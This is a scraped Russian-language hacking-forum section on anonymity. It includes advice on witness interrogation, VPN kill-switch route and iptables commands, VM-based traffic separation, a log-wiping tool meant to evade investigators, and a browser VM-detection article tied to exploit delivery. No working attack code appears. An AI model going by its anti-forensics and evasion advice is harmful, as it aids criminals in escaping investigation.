Как себя вести и что говорить на допросе
Далее поговорим подробно про самый распространённый обывательский вопрос: как себя вести и что же всё-таки говорить на допросе в качестве свидетеля?

Помните, что давать показания за вас, а уж тем более указывать что вам говорить никто не имеет право.

Первое и самое главное, что вы должны знать – в соответствии с Конституцией РФ, ст. 51: Никто не обязан свидетельствовать против себя самого, своего супруга и близких родственников.

Тем не менее, нужно понимать, что следователь – это профессионал своего дела и вы не первый его допрашиваемый.

Кроме этого, свидетель обязан давать показания! За отказ, как и за дачу ложных показаний может наступить уголовная ответственность.

Свидетель обязан давать показания. Продумайте что вы будете говорить следователю.
Чтобы обезопасить себя от “проблемных ситуаций” и лучше подготовиться к допросу постарайтесь сделать следующее:

Постарайтесь выяснить у следователя причину вызова на допрос. Он вам отвечать не обязан. Но все же получить нужную вам информацию стоить попробовать.

Выяснить у других свидетелей вызывали ли их на допрос и о чем их спрашивали.

Выработайте позицию ответов на вопросы со своим адвокатом.

Отправляйтесь на встречу со своим адвокатом.

Отвечать необходимо только на поставленные вопросы следователя. Если на вопрос можно ответить утвердительно, например, да или нет, то и не надо ничего лишнего от себя добавлять.

Говорите только о том, о чём вас спрашивают и не более того.

Знайте, что фраза «мне об этом ничего не известно» то же ответ. Если вам всё-таки хочется ответить на вопрос следователя, используйте формулу «точную дату или событие не помню». Помните, что “не знать” и “не помнить” — это ваше право.

Если в ходе допроса вы поймёте, что в вопросе следователя содержится прямой ответ, то будьте добры уточните у следователя или иного должностного лица, которое вас допрашивает, что конкретно он имеет в виду под данным вопросом. Наводящие вопросы запрещены. Однако следователи часто используют этот метод. Такой метод не законен.

Читайте внимательно протокол допроса от начала и до конца. Помните, что до его подписания вы можете просить следователя убрать ту или иную фразу. Не обращайте внимания на то, что следователь может на вас психологически давить.

Что должно быть в протоколе допроса
На практике зачастую происходит следующее. Следователь опрашивая свидетеля о тех или иных обстоятельствах дела, записывает и излагает его показания в протоколе допроса так как выгодно ему. В этом и заключаются подводные камни самого уголовного процесса, на который не советуем налетать.

Настаивайте на дословном изложении ваших показаний.

Если ваши фразы не исправлены или следователь не хочет исправлять ваши показания, или приобщать те или иные документы, то помните, что протокол содержит графу «замечания». В данной графе вы можете изложить те или иные замечания по существу вашего допроса. И только после этого вы вправе подписать протокол.

Помните, что во время допроса вы вправе записывать себе как вопросы следователя, так и ответы, чтобы контролировать ваш протокол допроса в качестве свидетеля.

Настаивайте на дословном изложении ваших показаний.
Можно ли перенести допрос
Люди часто задаются вопросом: «Как следователь может отреагировать на просьбу о переносе допроса?».

Не следует переживать об этом, следователь настроен на продуктивное общение со свидетелем, конфликты ему ни к чему, он заинтересован в быстром разрешении поставленной задачи.

Следователю будет проще согласиться с выставленными условиями свидетеля, нежели выбрать принудительную доставку свидетеля к себе в кабинет.

Если же у вас есть адвокат, все вопросы по организации и переносу допроса становятся его зоной ответственности.

Нужно ли брать документы на допрос
Часто бывает, что свидетель располагает документами, относящимися косвенно или напрямую к произошедшему событию.

В таком случае возникает логичный вопрос: Следует ли брать эти документы на допрос?

Если у вас есть документы, относящиеся к делу, в соответствии с ч.3 ст. 189 вы вправе взять их с собой. Но следует взвесить все «за» и «против» прежде, чем принимать такое решение.

Здесь следует проконсультироваться у адвоката о наличии возможных рисков. Его квалифицированная помощь была бы полезна для уточнения важных деталей:

Во-первых, документы могут составлять ценность для расследования, и следователь может принять решение об их изъятии в интересах следствия.

Во-вторых, такими действиями вы можете показать излишнюю осведомленность о деталях случившегося, что повлечёт за собой повышенное внимание к вашей персоне.

В-третьих, приходя на допрос с документами, вы уменьшаете свой запас времени на обдумывание каверзных вопросов следователя, то есть он может поинтересоваться о том, что указано в документах и варианта промолчать у вас уже не будет.

Можно ли приходить на допрос с другом или знакомым юристом
Иногда возникает желание прийти на данное мероприятие с людьми, которые смогут поддержать.

Но на допрос привести друзей и родственников не получится. Их банально не пустят в комнату, где вас будут допрашивать.

Только в одном случае на допросе могут присутствовать родственники и другие люди (кроме адвоката) – если свидетель является ребенком до 16 лет.

В соответствии со статьей 191 УПК РФ допрос детей до 16 лет производится в присутствии одного из родителей или психолога.

Также просто юрист не имеет процессуальных оснований присутствовать на допросе, в отличие от адвоката, имеющего соответствующий статус и удостоверение. Поэтому следует заключить договор с адвокатом, если у вас есть опасения и страхи перед этим мероприятием.

А что, если я совру или что-то напутаю на допросе
Часто в голове вызванного свидетеля или подозреваемого встает вопрос: «Что произойдёт, если я скажу ложь при допросе, забуду или перепутаю важные для дела обстоятельства?».

Главное – ответственно подойти к тому, что вы говорите следователю.

Говорите о том, что вы не уверены в деталях, если это так. В случае, если забыли информацию, то не надо изобретать что-то новое в кабинете следователя. Не выдавайте сплетни и чужие фантазии и домыслы за правдивую информацию по делу. Отвечайте прямо только на те вопросы, в правдивости ответов на которые вы уверены.

Даже если вы незнакомы с фигурантом уголовного дела, не относитесь безответственно к своим показаниям. Это может навредить невиновному и вам в том числе.

И не забывайте, что дача заведомо ложных показаний преследуется по закону.

Однако за случайные ошибки и заблуждения в показаниях ответственность не предусмотрена. Поэтому лучше, когда на допросе присутствует адвокат, который способен правильно сформулировать ответы на задаваемые следователем вопросы, заранее продумать тактику ответов на ожидаемые вопросы.

За случайные ошибки и заблуждения в показаниях ответственность не предусмотрена
Могут ли на допросе бить и оскорблять
Людям часто становится страшно идти на допрос по ряду всевозможных причин.

Волноваться не стоит, никаких незаконных действий по отношению к вам проводиться не будет.

**Но психологическое давление со стороны следователя возможно.

Следователь может использовать психологические и тактические приёмы и пытаться ввести вас в заблуждение, не говорить всей правды и скрывать текущий ход расследования. **

Отнеситесь к допросу серьезно, думайте, что и как вы говорите.

Даже если вы незнакомы с фигурантом уголовного дела, не относитесь безответственно к своим показаниям. Это может навредить невиновному и вам в том числе.

Что мне нужно подписывать на допросе
Это и есть самый важный вопрос. Не так важно, что вы сказали следователю, важнее то, что он за вами записал.

Документ, в который записаны все ваши показания и следует подписать. Называется такой документ – протокол допроса свидетеля. Ради этого документа вас и пригласили на допрос, это и есть доказательство, полученное в ходе беседы со следователем.

И за слова, записанные в протоколе, вам предстоит держать ответ, так как вы ставите под ним свою подпись.

Где предстоит держать ответ? В зале судебного заседания, ведь вы будете приглашены на допрос. Допрос, где вас допрашивает следователь, проводится в ходе предварительного следствия. А после следует стадия судебного разбирательства, где вас так же будут допрашивать, но уже судья. Поэтому не стоит верить словам следователя о том, что вас больше не вызовут.

Вам предстоит держать ответ в зале суда . В присутствии родственников подсудимого, прокурора и судьи.

Вам будут задавать вопросы, исходя из текста составленного следователем протокола. В случае, когда вы будете отказываться от своих слов, судья будет задавать вам прямые неудобные вопросы.

В суде, если вы откажетесь от своих слов, судья будет задавать вам прямые неудобные вопросы.

И вы будете чувствовать себя некомфортно. Во избежание столь неприятного момента, не подписывайте протокол допроса пока не изучите его.

Помните, что от содержания протокола может зависеть судьба человека или решение по расследуемому делу.

Что делать в случае, когда вы изучили протокол и нашли в нем несоответствие вашим словам или откровенную ложь
Не следует оставлять это без внимания, отказываясь от права подписи, так как следователь в дальнейшем может использовать это в свою пользу, указав, что вы отказались от подписания протокола.

Для того, чтобы избежать неприятностей в суде, следует разрешить проблему на стадии подписания протокола. Лучше это делать в присутствии адвоката.

Укажите на те места в протоколе, которые необходимо исправить, где вы обнаружили неточности или неполную информацию. Помните, что закон на вашей стороне.

В каком виде должны быть представлены показания в протоколе
Главное – это основной смысл написанного. Не надо требовать точного изложения и цитирования ваших слов. Следите, чтобы мысль, переданная вами при допросе, не была искажена следователем.

Укажите все замечания в специально отведённой для этого графе. Удостоверившись в правильности записанного в протоколе, вы должны его подписать. На данной стадии такое процессуальное действие как допрос считается оконченным.

**Надеюсь вам это не пригодится! Но знать это надо ...
_

(Если вам понравилась статья + мне репутацию также буду благодарен любой сумме btc )

Click to expand...

_**

Predator The Thief Cracked Что это такое объсяните пожалуйста, и что такое скрипт

ID: 676533bbb4103b69df371d0c
Thread ID: 33234
Created: 2019-11-16T17:20:50+0000
Last Post: 2019-11-17T02:01:32+0000
Author: Nimiro
Replies: 12 Views: 2K

Пожалуйста объясните, что это такое как это работает, очень хочу знать

Дайте ссылку на kodachi 3.7

ID: 676533bbb4103b69df371d0e
Thread ID: 28245
Created: 2019-03-12T17:28:48+0000
Last Post: 2019-11-14T20:56:55+0000
Author: narwuu
Replies: 1 Views: 2K

Дайте ссылку на kodachi 3.7, а то на всех ресурсах только 6.0

Создание проекта по очистке логов с Windows/Linux

ID: 676533bbb4103b69df371d12
Thread ID: 32397
Created: 2019-10-10T17:35:07+0000
Last Post: 2019-11-01T01:15:22+0000
Author: P1nkF10yd
Replies: 14 Views: 2K

Всем привет!

Не давно столкнулся с такой задачей как полная очистка логов, без существенного вреда ПК. Начал изучать и оказалось что по этой теме не так уж и много материала.
Предлагаю Вашу внимаю проект с минималистическим названием "NKVD", тут я буду собирать все логи которые стоят удалять что бы к Вам не пришли люди из организаций их 3 букв.

Проект:

https://github.com/p1nkfl0D/NKVD

P.S пока на бета-тесте . И главное не работайте по ру.

Блокируем утечку трафика и при разрыве соединения с VPN на WIN 7-10 & Debian

ID: 676533bbb4103b69df371d16
Thread ID: 26753
Created: 2018-12-06T10:21:17+0000
Last Post: 2019-10-27T12:05:20+0000
Author: Desoxyn
Replies: 3 Views: 2K

WINDOWS
У нормальных клиентов которые поставляются вместе с услугой ВПН, есть функция killswitch, тобишь при потери конекта с сервером траф полностью блокируется.
Но есть клиенты без этой фичи либо она работает криво.
Если нет такой фичи, то не беда, делаем подобное сами без стронних мутных утилит.
Запилим батник с командами:

Code:Copy to clipboard

route delete 0.0.0.0 mask 0.0.0.0 route delete 0.0.0.0 mask 128.0.0.0 route add 111.222.111.222 mask 255.255.255.255 route add 0.0.0.0 mask 0.0.0.0 1.2.3.4

После подключения к ВПН чекаем его IP и втыкаем вместо 111.222.111.222
Далее наводим на подключенный "законнокченный" значок ВПН в правом нижнем углу. Нас интересует только последняя строка:
пример: назначенный IP: 192.168.7.5 Этот IP нам назначил сервис ВПН при подключении.

Далее запускаем cmd и вбиваем команду: route print (смотрим таблицу маршрутизации)
нас интересует таблица интерфейс (в нем ищем назначенный нам ВПНом ip адрес) и смотрим левее от него адрес шлюза обычно он бывает на единицу меньше, но на всякий случай и проверяем в этой таблице в нашем случае это 192.168.7.5 берем и вписываем в наш батник вместо 1.2.3.4
Теперь сохраняем файл и запускаем его от имени администратора (без админ прав не пропишется в таблицу).

Все теперь весь трафик идет строго через ВПН и в случае падения ВПНа весь трафик блокируется полностью. Проверить можете очень просто, после всех манипуляций опять в cmd вводите команду ping www.google.com -t пойдут постоянные пинги до гугла. Теперь просто разорвите соединение с ВПН и все пинги и прочее пропадут.

Да и еще важный момент, все настройки в этой таблице роутинга сохраняются до перезагрузки вашего сетевого интерфейса, через который вы получаете интернет (кабель, вай фай, 3джи и тд). Тобишь разорвалось соединение с впн трафик закончился, вышли отовсюду что может вас спалить (виртуалки, месенджеры и прочее) перезапустили 3джи или вай фай в "Панель управления\Все элементы панели управления\Центр управления сетями и общим доступом" и заново подключаетесь к впну и с первого пункта.

Стоит один раз сделать такой батник и просто всегда при подключении проверяйте шлюз, который вам присвоил ВПН сервис, далее вставляете его в BAT файл и запускаете от имени администратора.
По этому принципу и работает killswitch у клиентов от ВПН.

DEBIAN
Пример блокировки трфа на моем любимом Debian
Прeдcтaвимcя cиcтeмe cупeрпользовaтeлeм

Code:Copy to clipboard

# su

cоздaдим фaйл c прaвилaми iptables:

Code:Copy to clipboard

# nano /etc/iptables.sh

Добaвим нaбор проcтых прaвил для бaзовой нacтройки:

Code:Copy to clipboard

#!/bin/bash # Очищaeм прaвилa iptables iptables -F iptables -F -t nat iptables -F -t mangle iptables -X iptables -t nat -X iptables -t mangle -X # Уcтaнaвливaeм прaвилa по умолчaнию (зaпрeтить любой трaфик) iptables -P INPUT DROP iptables -P OUTPUT DROP iptables -P FORWARD DROP # Рaзрeшaeм локaльный трaфик для loopback iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT # Пропуcкaть вce инициировaнныe cоeдинeния, a тaкжe дочeрниe от них iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT # Отбрacывaть пaкeты, которыe нe могут быть идeнтифицировaны iptables -A INPUT -m state --state INVALID -j DROP # cохрaняeм прaвилa /sbin/iptables-save > /etc/iptables_rules

Дaeм фaйлу который мы только что cоздaли прaво нa зaпуcк:

Code:Copy to clipboard

# chmod 0740 iptables.sh

Зaпуcкaeм нa выполнeниe:

Code:Copy to clipboard

#sh /etc/iptables.sh

Провeряeм прaвилa:

Code:Copy to clipboard

# iptables -L -v -n

Прaвилa примeнилиcь и произошлa их зaпиcь в фaйл /etc/iptables_rules
Тeпeрь нужно, чтобы они примeнялиcь при кaждой зaгрузкe ceрвeрa
Открывaeм фaйл /etc/network/interfaces и добaвляeм в нeго cтрочку:

Code:Copy to clipboard

post-up iptables-restore < /etc/iptables_rules

Вот и вce! Бaзовaя нacтройкa фaeрволлa зaвeршeнa. Покa у вac нe получитcя выйти в интeрнeт. Нaм вeдь нужно выйти нa проcторы ceти aнонимно? Вeдь тaк? Тогдa нужно нeмного подождaть.

Отключaeм ipv6:

Code:Copy to clipboard

# echo «#disable ipv6» | tee -a /etc/sysctl.conf # echo «net.ipv6.conf.all.disable_ipv6 = 1» | tee -a /etc/sysctl.conf # echo «net.ipv6.conf.default.disable_ipv6 = 1» | tee -a /etc/sysctl.conf # echo «net.ipv6.conf.lo.disable_ipv6 = 1» | tee -a /etc/sysctl.conf # sysctl -p

Провeряeм, что ipv6 отключeн:

Code:Copy to clipboard

# ifconfig | grep inet6

Далее идет нacтройкa фaeрволлa для VPN (клиeнт OpenVPN).

Открывaeм фaйл /etc/iptables.sh

Code:Copy to clipboard

# nano /etc/iptables.sh

Добaвляeм cтрочки пeрeд cтрочкой # cохрaняeм прaвилa:

Нacтройки VPN

Code:Copy to clipboard

iptables -A OUTPUT -o tun0 -j ACCEPT iptables -A OUTPUT -p udp -d $1/32 --dport 1194 -j ACCEPT

Зaпуcкaeм cкрипт и пeрeдaeм eму IP VPN-ceрвeрa в кaчecтвe eдинcтвeнного пaрaмeтрa:

Code:Copy to clipboard

# sh /etc/iptables.sh [cюдa подcтaвляйтe IP VPN-ceрвeрa вaшeго провaйдeрa] Пример: # sh /etc/iptables.sh 100.91.89.12

Тaким не хитрым обрaзом можно быcтро и лeгко cмeнить IP ceрвeрa VPN, на мой взгляд удобно пeрeключaтьcя мeжду ceрвeрaми. Вы жe пeрeключaeтecь, прaвдa?
p.s
Сори за отсутствия картиночек с стрелочками как вы это любите этот вариант статьи для копирования в блокнотик и применяется в "полевых" условиях.

Автор

Socks5 Proxy

ID: 676533bbb4103b69df371d18
Thread ID: 32185
Created: 2019-10-01T12:18:25+0000
Last Post: 2019-10-16T22:35:49+0000
Author: Nordman
Replies: 13 Views: 2K

Hidden content for authorized users.

19к свежак.txt - AnonFile

anonfile.com

Анонимность и безопасность ч4 – Разделения трафика.

ID: 676533bbb4103b69df371d19
Thread ID: 32523
Created: 2019-10-15T19:09:27+0000
Last Post: 2019-10-15T19:09:27+0000
Author: Benihowy
Prefix: Статья
Replies: 0 Views: 2K

Доброго времени суток. В этой части поговорим про трафик, генерируемый различными приложениями, основными из них браузер и мессенджер. Мой метод основан на том, что необходимо экранировать трафик друг от друга. Много кто сидит в соц. сетях, ютубе, торрент трекерах и тд. Необходимо разделить этот трафик. Каждый браузер должен быть на отдельной ВМ с жесткими правилами. К примеру, я сижу в вк, и у меня правила в proxifier прописаны только для вк.

Для ютуба похожие правила.

Нужно понимать, что не все запросы нужны для приложения. Некоторые из них для рекламы, обновления и слежки. К примеру, для вайбера нужно заблокировать такие запросы в proxifier как: *.update.viber.com; *.ads.viber.com; *.market.viber.com.
Что мы имеем в итоге? Посещение сайтов, которые запущенные на разных машинах и имеют разные ip. Не секрет, что сайты введут логи, и в каждом логе вы будете под другой личностью. Нужно не иметь точек соприкосновения между сайтами. Это также защитит другие ВМ, если одна из них будет скомпрометирована злоумышленником.

Теперь поговорим по поводу торрентов. Торренты не следует гонять на трафике тор, это не рекомендуют делать разработчики, так как это засоряет сеть. Их можно перенаправлять на впн, однако, нечего страшного если он пойдет через ваш реальный ip. У торрента есть два вида трафика, один из них идет на трекер, для технической информации, а другой для скачивания файлов. И именно второй трафик нужно посылать через реальный ip. Как это сделать?

В target host написаны адреса трекеров, с которых вы качаете. Их и нужно пробрасывать через виртуальные роуторы. Остальной трафик торрента делаем напрямую.

Под ip адресом 192.168.9.1 находится шлюз для торрентов, он аналогичен шлюзу ext. Он также подключается к модему провайдера и имеет немного отличительные настройки файервола.
В первой статье я писал, что хост (гипервизор) не должен иметь доступа не к одной сети. Ну это в идеале. В противном случае есть вероятность того, что хост может быть скомпрометирован (к примеру, вам нужно где-то хранить скачанные торренты, в таком случае у ВМ должен быть доступ к шаре на хосте).

Есть ли опасность в этом сайте? (ссылка в теме)

ID: 676533bbb4103b69df371d7a
Thread ID: 27397
Created: 2019-01-21T05:58:42+0000
Last Post: 2019-01-21T17:25:37+0000
Author: Stripes
Replies: 3 Views: 2K

rocket-bank.blogspot.com

Скинули ссылку, якобы на оформление карты. При переходе и правда есть редирект на нормальный сайт банка, всё ок. Но выглядит очень странно, есть ли в этом какой-то подвох? Даже непонятно, как создан редирект. Могут ли быть скомпроментированы личные данные, введенные на сайте банка после перехода?

Анонимность и безопасность ч3 – Промежуточные роуторы.

ID: 676533bbb4103b69df371d1a
Thread ID: 32491
Created: 2019-10-14T16:29:41+0000
Last Post: 2019-10-14T17:18:46+0000
Author: Benihowy
Prefix: Статья
Replies: 2 Views: 2K

Доброго времени суток. В этой части поговорим про роуторы. Это виртуальные машины, которые заворачивают трафик через тор, впн, прокси и тд.
Рассмотрим ВМ, на которой будет установлен ВПН клиент. Для этого понадобится виртуальная машина, которая была настроенная в прошлой статье. Для того, чтобы, каждый раз не настраивать, можно создать эталонный диск с уже всеми готовыми настройками. Дальше следует только копировать диск и подключать к новой виртуальной машине.
Необходимый софт: openvpn клиент, agnitum firewall, ccproxy и proxifier. Рассмотрим настройки сетевого подключения. Я создал частную сеть между этим роутором и тем, что на входе (шлюз, я его называю "ext", сокращено от external).

Естественно, ip адреса ставьте свои. Через proxifier пробрасываем трафик на прокси сервер шлюза. Нужно знать, для openvpn’a необходим основной шлюз в настройки сетевого подключения, и в некоторых случаях прописывать dns (если в конфигурации vpn’a есть доменное имя). После ввода адреса прокси сервера расположенного на шлюзе (ext)

переходим к настройки. Вторая строка обязательна, ведь ccproxy проверяет обновление. В третьей строке написан порт 1194, это зависит от настройки сервера.

Если вместо vpn используется тор, то настройки будут похожие. Настройки ссproxy и файервола рассматривать не стану. Думаю, все очевидно, если что, отсылка к предыдущей статье.

Скрывает ли VPN местоположение?

ID: 676533bbb4103b69df371d21
Thread ID: 26699
Created: 2018-12-01T10:26:30+0000
Last Post: 2019-10-09T20:07:32+0000
Author: HYF
Replies: 5 Views: 2K

Если кто-то из вас полагает, что цепочки Socks & VPN однозначно скрывают Ваш IP адрес, то Вы сильно ошибаетесь. Скрывает только от тех, кому не интересны ваши персональные данные, от остальных не скрывает.
Не верите?
Подключите VPN или Socks и выполните в командной строке route print или ipconfig , там вы найдете свой реальный IP адрес, через который подключен VPN или Socks.

Кто мешает любой программе или скрипту получить доступ к этой информации - ни кто не мешает. Наша задача предотвратить это безобразие.

В интернете уже миллион раз обсудили разные преимущества использования виртуальных машин в различных ситуациях и, если кто-то еще с этим не знаком, то множество статей можно найти через поисковики. Только вот гуглить опять же безопаснее с виртуальной машины, об этом тоже написано немало статей.

Предлагаю рассмотреть использование виртуальных машин для сетевой безопасности, сохранения в реальной тайне своих персональных данных и своего реального IP адреса.

(сам сейчас не дома нахожусь, поэтому пришлось делать статью на старом компьютере)

Задачи :

не дать возможности любому ПО, скриптам и т.п. получить данные о реальном соединении с интернетом и реальном IP адресе

разделить трафик одного модема на два разных маршрута:

- открытый для ресурсов, на которых Вам нечего скрывать (для общения с друзьями)

- закрытый для ресурсов, на которых должна быть исключена ассоциация Вас с конкретной личностью

Что для этого понадобиться :

компьютер или ноутбук средней мощности, с поддержкой виртуализации

аккаунт OpenVPN на правильно сконфигурированном сервере

начальные знания по настройке локальной сети

Дополнительное ПО :

(приведено наиболее простое в настройке, вы можете использовать другое на свое усмотрение)

CCProxy - легкий прокси-сервер

Proxifier - программа для туннелирования трафика через прокси-сервера

Кажется сложным?

На самом деле это очень просто.
Представьте, что это не виртуальная машина, а обычный компьютер в соседней комнате, соединенный кабелем с Вашим компьютером. Всего-то надо настроить между ними соединение.

Если виртуальные машины установлены, то можно приступать. Процесс настройки данной схемы занимает 2-3 минуты.
Если не установлены, то установите. Есть много описаний как это сделать. Как вариант для знакомства с виртуальными машинами я бы рекомендовал VirtualBox.

Понятия :

хостовая машина - ваш основной физический компьютер

гостевая машина - виртуальный компьютер

Настройка сети
Ни какой автоматизации типа DHCP и прочих схем, которые могут что-либо изменить в нашей сети без нашего ведома мы применять не будем. Только ручная настройка.

Первая гостевая машина
1. Перед стартом установите виртуальную сетевую карту в режим «Сетевой мост».
(выбор физического адаптера для создания моста зависит от конкретного случая, чаще всего это адаптер Вашей локальной сети)

2. Запустите гостевую машину, зайдите в свойства сетевого адаптера гостевой ОС.
3. Настройте IP адрес таким образом, что бы гостевая машина оказалась в одной сети с хостовой. Основной шлюз и DNS-сервера оставьте пустыми.
(на хостовой машине 192.168.128.2, на первой гостевой 192.168.128.3, на второй гостевой 192.168.128.4)
4. Настройте привычным способом подключение к интернету на этой гостевой машине (через PPPoE или USB-модем).
5. Установите прокси-сервер CCProxy на гостевой машине и настройте как на скриншоте. Другие настройки не трогайте.

Всё. Первая машина готова к работе, её можно свернуть и приступить к настройке второй.
На первой машине не следует больше ни чего делать. Забудьте, что она вообще у вас есть. Её единственная задача - это раздать интернет в локальную сеть.

Вторая гостевая машина
(если не установлена, то можно сделать копию с первой)
1. - 3. Повторите, как и в первой машине.
4. Командой ping проверьте связь с первой гостевой машиной.
5. Установите клиент OpenVPN.
6. Откройте в текстовом редакторе файл конфигурации OpenVPN c:\Program Files\OpenVPN\config\*.ovpn
7. Допишите в конец IP адрес и порт Вашего прокси-сервера socks-proxy 192.168.128.3 1086
client
proto udp
dev tun
remote us1.hostvpn.net 16699
comp-lzo
persist-key
persist-tun
ca ca.crt
cert user032.crt
key user032.key
tls-auth ta.key 1
socks-proxy 192.168.128.3 1086
8. Установите OpenVPN соединение (я бы рекомендовал сделать это службой и установить службу в «Авто», что бы VPN был на этой машине сразу после старта).
Эту машину теперь можно использовать для работы через VPN и, во избежание ассоциаций Вас с реальной личностью нельзя использовать для сайтов и аккаунтов, которые содержат Ваши личные данные.
Если что-то пошло не так, то проверьте правильность всех настроек.

Хостовая машина - последний штрих
Пора вспомнить о том, что мы в какой-то мере имеем реальную жизнь, вполне реальных друзей, которые знают наш домашний адрес, им не надо нас вычислять по IP адресу. Скрывать свой реальный IP от своего провайдера, зайдя на его сайт, также бессмысленно. Ни чего страшного не случится, если мы проверим свой личный E-Mail со своего IP адреса или посмотрим прогноз погоды в своем городе.

Установите на хостовую машину Proxifier, пропишите в настройках адрес и порт своего виртуального прокси-сервера, укажите где искать DNS-сервер.

Тут ошибка пишите 192.168.128.3 1086

Всё готово.

Что мы получили?

В нашем распоряжении теперь три компьютера (один живой + два виртуальных)

первый компьютер знает про интернет и подключен к нему, но мы его будем использовать только как прокси-сервер, максимум - это установим фаервол

второй ни чего не знает про интернет до момента подключения к OpenVPN, а после подключения он знает только то, что появилась виртуальная локальная сеть с виртуальными IP и виртуальными MAC и через эту виртуальную сеть можно выйти в интернет через другую страну

на втором компьютере нет маршрутизации, связанной с нашими реальными IP адресами

на втором компьютере при необходимости можно также запустить прокси на другом порту и расширить свой OpenVPN для других компьютеров в своей например Wi-Fi сети

на втором компьютере так же не хранятся ни какие персональные данные и с него мы не заходим в личные аккаунты

третий тоже ни чего не знает про интернет, но мы ему можем показать, что в локальной сети есть прокси

На реальной оси подцепляете VPN, а на виртуалки подключаетесь к инету, через эту сеть, в итоге скрываем

Свой IP-адрес, MAC, и защищаемся от вредоносных скриптов

Можно создать несколько гостевых ОС для разных целей + снимки системы, чтобы вернуть в исходное состояние машину, тогда вообще никакие скрипты не страшны

В итоге мы имеем одновременно два разных маршрута, по одному из которых мы можем общаться с друзьями, а по второму маршруту проявлять фантазию через OpenVPN

докс

ID: 676533bbb4103b69df371d28
Thread ID: 31877
Created: 2019-09-18T07:54:10+0000
Last Post: 2019-09-22T10:19:11+0000
Author: netyshka
Replies: 1 Views: 2K

Всем привет, хотел бы поинтересоваться, как вообще доксят людей и что нужно, чтобы это предотвратить
Возможно, вопрос глупый на этом форуме, но я не знаю больше форумов с такой тематикой

Создаём антивирус на базе virus total (размышления)

ID: 676533bbb4103b69df371d2a
Thread ID: 31893
Created: 2019-09-19T00:24:32+0000
Last Post: 2019-09-19T11:34:03+0000
Author: xxSadxx
Replies: 3 Views: 2K

Здравствуйте дорогие форумчане, возможно ли создать свой антивирус, который будет связан с сайтом virus total, и будет отправлять запрос на проверку файлов ему? Если да - то мы сможем сделать предложение из сайта virus total.

Почему происходит блокировка?

ID: 676533bbb4103b69df371d2c
Thread ID: 31862
Created: 2019-09-17T20:56:55+0000
Last Post: 2019-09-18T14:10:43+0000
Author: PegasMoney
Replies: 5 Views: 2K

Когда захожу через эмулятор в приложение своего банка,то у меня блокируется мой аккаунт? Раньше спокойно заходил,было всё норм.
Пробовал менять IP,не помогло,какие данные ещё может отследить банк,чтобы по ним блокировать?

Временная почта

ID: 676533bbb4103b69df371d2d
Thread ID: 31760
Created: 2019-09-15T00:50:58+0000
Last Post: 2019-09-15T00:50:58+0000
Author: GunQuest
Replies: 0 Views: 2K

Все уже наверно знакомы с сервисом temp mail или же с временной почтой. Суть этих сервисов проста - они выдают временную одноразовую почту. Временная почта защищает вашу основную почту от:

Спама

Фишинга

Рекламных рассылок

Если вам нужна одноразовая почта на один раз вы можете зайди на сайт https://temp-mail.org/ru/ и получить вашу временную почту. Если же вы планируете постоянно использовать временную почту рекомендую вам установить расширение на ваш браузер. Если вы установите расширение вы сможете почти каждую секунду менять почту. Желаю удачи. Оставайтесь анонимными.

Spoiler: Сайт

https://temp-mail.org/ru/

Spoiler: Расширение для google chrome

[https://chrome.google.com/webstore/...e-temp/inojafojbhdpnehkhhfjalgjjobnhomj?hl=ru](https://chrome.google.com/webstore/detail/temp- mail-disposable-temp/inojafojbhdpnehkhhfjalgjjobnhomj?hl=ru)

Spoiler: Расширение для Opera

<https://addons.opera.com/ru/extensions/details/temp-mail-disposable- temporary-email/>

Spoiler: Расширение для mozila/firefox

https://addons.mozilla.org/ru/firefox/addon/temp-mail/

[Вопрос] Деанон в балаклаве

ID: 676533bbb4103b69df371d2f
Thread ID: 31751
Created: 2019-09-14T14:18:24+0000
Last Post: 2019-09-14T20:00:56+0000
Author: Hybrid
Replies: 1 Views: 2K

Часто вижу каналы на Ютубе, где челики сидящие в балаклаве рассказывают как жить.
Собственно вопрос - как быстро их деанонят?

Обнаружение виртуальной машины в браузере

ID: 676533bbb4103b69df371d34
Thread ID: 31211
Created: 2019-08-20T13:47:17+0000
Last Post: 2019-08-21T04:27:13+0000
Author: neopaket
Prefix: Статья
Replies: 1 Views: 2K

Обнаружение виртуальной машины¹ в браузере
¹ - программная и/или аппаратная система, эмулирующая аппаратное обеспечение некоторой платформы.

Вступление

Обнаружение виртуальной машины (ВM) не является чем-то необычным. Вредоносные программы делают это уже более десяти лет. Со временем методы расширились, поскольку были придуманы новые способы избежать обнаружения ВМ.

Некоторое время назад мы с другом работали над проектом, связанным с эксплойтом доставки через веб-приложение в целях перенаправления. Мне нужен был способ сделать отпечатки пальцев (В прямом смысле) посетителей сайта и хэшировать эти данные, чтобы я мог искать потенциальных повторных посетителей. При исследовании отпечатков пальцев я наткнулся на что-то довольно интересное. Я искал код, который собирал информацию о возможностях WebGL. Я быстро понял, что некоторая информация о дактилоскопии (Способ опознания человека по отпечаткам пальцев, основанный на неповторимости рисунка кожи) может быть полезна для обнаружения виртуальных машин. В этом конкретном случае строка «VMWare» содержалась в информации WebGL. После еще одного тестирования я также обнаружил, что VirtualBox сообщает о такой же информации.

Когда я понял, что потенциально возможно обнаружить виртуальные машины из браузера, я начал копать глубже и искать другие исследования, связанные с этим открытием. Я нашел довольно хорошо изученную академическую статью [1], связанную с отслеживанием пользователей в разных браузерах. Это дало мне некоторые другие потенциальные методы, которые можно было бы применить к обнаружению виртуальных машин.

Конечная цель этого исследования - создать несколько методов обнаружения виртуальных машин. Многократные методы приводят к намного более точному обнаружению. Поскольку некоторые методы более склонны к ложному срабатыванию, чем другие, для определения возможностей может быть применена система взвешивания. Это позволяет нам генерировать оценку достоверности обнаружения. Это может помочь объяснить неточности некоторых методов обнаружения. Учитывая достаточное количество тестов и данных, можно будет прийти к разумному пороговому (критическому) значению. Если браузер набирает баллы выше порогового значения, он, скорее всего, будет находиться внутри виртуальной машины. В качестве альтернативы, если браузер получил оценку ниже порогового значения, он может рассматриваться как работающий на физическом оборудовании.

Методы

Теперь, когда я рассмотрел некоторую справочную информацию и историю, приведшую к этому сообщению в блоге, мы можем начать копаться в существующих методах.

Как упоминалось ранее во введении, WebGL может предоставить много информации о реализации OpenGL, включая информацию о поставщике. Расширение WEBGL_debug_renderer_info [[2]](https://developer.mozilla.org/en- US/docs/Web/API/WEBGL_debug_renderer_info) может использоваться для запроса отладочной информации, такой как поставщик WebGL.

Code:Copy to clipboard

